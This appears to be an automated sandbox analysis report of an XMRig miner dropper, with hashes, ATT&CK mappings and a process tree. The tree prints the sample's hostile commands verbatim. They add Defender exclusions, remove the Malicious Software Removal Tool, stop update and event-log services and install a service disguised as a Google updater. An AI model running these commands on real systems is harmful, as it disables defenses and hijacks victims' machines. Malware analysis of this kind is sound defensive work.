xmrig | 50d3bf20e1534889385de4b8d780a750c9d37a75c941ffae6dd961caef2eb325

Analysis

max time kernel
149s
max time network
146s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
19-12-2024 13:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

19-12-2024_UqVE2XPvW38Pgkj.zip
Size

4.3MB
MD5

cf356b163f946dc2f16d95febf45a583
SHA1

e7c8e964c23f86765d729b82d3140604bb00cb7c
SHA256

50d3bf20e1534889385de4b8d780a750c9d37a75c941ffae6dd961caef2eb325
SHA512

baa6367011ebda751fe7ef40a49f99e96c5daf19e068b02b2cdf564477f17a792a9dc0887b9723208d0c49d55a7e1c501723643d12fee8c8dcd0d1406e65be2d
SSDEEP

98304:YIv1mD5TqdFfK4iBOqWh3tWyfzbgwgGP7OZlGWwCR6t+uWiPBt1KP:YIdmFkF7iMtWKzkwgh1wc6t+cBS

Score

10^/10

xmrig defense_evasion discovery evasion execution miner persistence upx

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/memory/568-120-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/568-119-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/568-125-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/568-126-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/568-124-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/568-122-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/568-123-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/568-130-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/568-131-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1356	powershell.exe
5048	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	Bootstrapper.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000\Control Panel\International\Geo\Nation	Bootstrapper.exe

Executes dropped EXE 3 IoCs

pid	Process
4244	Bootstrapper.exe
3416	Bootstrapper.exe
3496	updater.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
43	pastebin.com
45	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2716	powercfg.exe
3616	powercfg.exe
2140	powercfg.exe
4852	powercfg.exe
4280	powercfg.exe
2000	powercfg.exe
4932	powercfg.exe
5004	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	Bootstrapper.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	updater.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3496 set thread context of 3308	3496	updater.exe	152
PID 3496 set thread context of 568	3496	updater.exe	157

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/568-114-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-117-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-113-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-120-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-119-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-125-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-126-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-124-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-122-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-123-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-118-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-116-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-130-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/568-131-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\WinSxS\pending.xml	TiWorker.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2292	sc.exe
3556	sc.exe
4520	sc.exe
2192	sc.exe
3164	sc.exe
1044	sc.exe
2012	sc.exe
3836	sc.exe
1636	sc.exe
4284	sc.exe
3532	sc.exe
2396	sc.exe
3980	sc.exe
4496	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bootstrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies data under HKEY_USERS 50 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2508	powershell.exe
2220	powershell.exe
2220	powershell.exe
2508	powershell.exe
3416	Bootstrapper.exe
5048	powershell.exe
5048	powershell.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3416	Bootstrapper.exe
3496	updater.exe
1356	powershell.exe
1356	powershell.exe
3496	updater.exe
3496	updater.exe
3496	updater.exe
3496	updater.exe
3496	updater.exe
3496	updater.exe
3496	updater.exe
3496	updater.exe
3496	updater.exe
3496	updater.exe
3496	updater.exe
3496	updater.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe
568	explorer.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2504	7zFM.exe
4812	OptionalFeatures.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2504	7zFM.exe
Token: 35	2504	7zFM.exe
Token: SeSecurityPrivilege	2504	7zFM.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeIncreaseQuotaPrivilege	2220	powershell.exe
Token: SeSecurityPrivilege	2220	powershell.exe
Token: SeTakeOwnershipPrivilege	2220	powershell.exe
Token: SeLoadDriverPrivilege	2220	powershell.exe
Token: SeSystemProfilePrivilege	2220	powershell.exe
Token: SeSystemtimePrivilege	2220	powershell.exe
Token: SeProfSingleProcessPrivilege	2220	powershell.exe
Token: SeIncBasePriorityPrivilege	2220	powershell.exe
Token: SeCreatePagefilePrivilege	2220	powershell.exe
Token: SeBackupPrivilege	2220	powershell.exe
Token: SeRestorePrivilege	2220	powershell.exe
Token: SeShutdownPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeSystemEnvironmentPrivilege	2220	powershell.exe
Token: SeRemoteShutdownPrivilege	2220	powershell.exe
Token: SeUndockPrivilege	2220	powershell.exe
Token: SeManageVolumePrivilege	2220	powershell.exe
Token: 33	2220	powershell.exe
Token: 34	2220	powershell.exe
Token: 35	2220	powershell.exe
Token: 36	2220	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeIncreaseQuotaPrivilege	5048	powershell.exe
Token: SeSecurityPrivilege	5048	powershell.exe
Token: SeTakeOwnershipPrivilege	5048	powershell.exe
Token: SeLoadDriverPrivilege	5048	powershell.exe
Token: SeSystemProfilePrivilege	5048	powershell.exe
Token: SeSystemtimePrivilege	5048	powershell.exe
Token: SeProfSingleProcessPrivilege	5048	powershell.exe
Token: SeIncBasePriorityPrivilege	5048	powershell.exe
Token: SeCreatePagefilePrivilege	5048	powershell.exe
Token: SeBackupPrivilege	5048	powershell.exe
Token: SeRestorePrivilege	5048	powershell.exe
Token: SeShutdownPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeSystemEnvironmentPrivilege	5048	powershell.exe
Token: SeRemoteShutdownPrivilege	5048	powershell.exe
Token: SeUndockPrivilege	5048	powershell.exe
Token: SeManageVolumePrivilege	5048	powershell.exe
Token: 33	5048	powershell.exe
Token: 34	5048	powershell.exe
Token: 35	5048	powershell.exe
Token: 36	5048	powershell.exe
Token: SeShutdownPrivilege	2716	powercfg.exe
Token: SeCreatePagefilePrivilege	2716	powercfg.exe
Token: SeShutdownPrivilege	5004	powercfg.exe
Token: SeCreatePagefilePrivilege	5004	powercfg.exe
Token: SeShutdownPrivilege	4932	powercfg.exe
Token: SeCreatePagefilePrivilege	4932	powercfg.exe
Token: SeShutdownPrivilege	2000	powercfg.exe
Token: SeCreatePagefilePrivilege	2000	powercfg.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1356	powershell.exe
Token: SeIncreaseQuotaPrivilege	1356	powershell.exe
Token: SeSecurityPrivilege	1356	powershell.exe
Token: SeTakeOwnershipPrivilege	1356	powershell.exe
Token: SeLoadDriverPrivilege	1356	powershell.exe
Token: SeSystemtimePrivilege	1356	powershell.exe
Token: SeBackupPrivilege	1356	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2504	7zFM.exe
2504	7zFM.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4244	Bootstrapper.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 4244 wrote to memory of 2508	4244	Bootstrapper.exe	95
PID 4244 wrote to memory of 2508	4244	Bootstrapper.exe	95
PID 4244 wrote to memory of 2508	4244	Bootstrapper.exe	95
PID 4244 wrote to memory of 2220	4244	Bootstrapper.exe	97
PID 4244 wrote to memory of 2220	4244	Bootstrapper.exe	97
PID 4244 wrote to memory of 2220	4244	Bootstrapper.exe	97
PID 4244 wrote to memory of 3416	4244	Bootstrapper.exe	99
PID 4244 wrote to memory of 3416	4244	Bootstrapper.exe	99
PID 5084 wrote to memory of 4884	5084	cmd.exe	108
PID 5084 wrote to memory of 4884	5084	cmd.exe	108
PID 3076 wrote to memory of 2664	3076	cmd.exe	139
PID 3076 wrote to memory of 2664	3076	cmd.exe	139
PID 3496 wrote to memory of 3308	3496	updater.exe	152
PID 3496 wrote to memory of 3308	3496	updater.exe	152
PID 3496 wrote to memory of 3308	3496	updater.exe	152
PID 3496 wrote to memory of 3308	3496	updater.exe	152
PID 3496 wrote to memory of 3308	3496	updater.exe	152
PID 3496 wrote to memory of 3308	3496	updater.exe	152
PID 3496 wrote to memory of 3308	3496	updater.exe	152
PID 3496 wrote to memory of 3308	3496	updater.exe	152
PID 3496 wrote to memory of 3308	3496	updater.exe	152
PID 3496 wrote to memory of 568	3496	updater.exe	157
PID 3496 wrote to memory of 568	3496	updater.exe	157
PID 3496 wrote to memory of 568	3496	updater.exe	157
PID 3496 wrote to memory of 568	3496	updater.exe	157
PID 3496 wrote to memory of 568	3496	updater.exe	157

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\19-12-2024_UqVE2XPvW38Pgkj.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2504

C:\Users\Admin\Desktop\Bootstrapper.exe
"C:\Users\Admin\Desktop\Bootstrapper.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4244
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAagBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAdABmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAG8AcgA6ACAAQwBvAHUAbABkACAAbgBvAHQAIABzAHQAYQByAHQAOgAgAC4ATgBFAFQAIABGAHIAYQBtAGUAdwBvAHIAawAgADQALgA4AC4AMQAgAG4AbwB0ACAAaQBuAHMAdABhAGwAbABlAGQALgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAbQBxAGcAIwA+AA=="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2508
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAcgB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAbQBpACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2220
- C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
  "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:3416
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5084
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4884
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1044
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2396
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1636
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:3556
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:3980
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2000
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5004
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:2012
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3836
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:3164
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:4284

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3496
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3076
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2664
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4520
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4496
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2192
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:3532
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2292
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:3616
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:2140
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4280
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:4852
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3308
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:568

C:\Windows\system32\OptionalFeatures.exe
"C:\Windows\system32\OptionalFeatures.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:4812

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:3792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
f9349064c7c8f8467cc12d78a462e5f9

SHA1
5e1d27fc64751cd8c0e9448ee47741da588b3484

SHA256
883481fe331cb89fb6061e76b43acd4dd638c16f499b10088b261036c6d0547b

SHA512
3229668491b5e4068e743b31f2896b30b1842faf96aff09fad01b08771c2f11eb8d8f02a3b76e31f0d6ad650c2894c5ac1822204e132c03d9c2b8df6ca4cd7cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
be117e63dd6a2c987a26fcb7cb807074

SHA1
e959eb9b2a63412b43d09bf331227420839f19f3

SHA256
bbb7d143b7c863163c0635e3b3b75d7e8e8e6c85278adf906db077751b9024e0

SHA512
e6de82ab34c03db1f8e9ddf38833bf16ea6c4dcf9c16f0a4f06c1eab44684a1185e7991f33f6603a87823549a059f5bc920b745b6448ba570bf21c89dc6ca1de

Download Submit
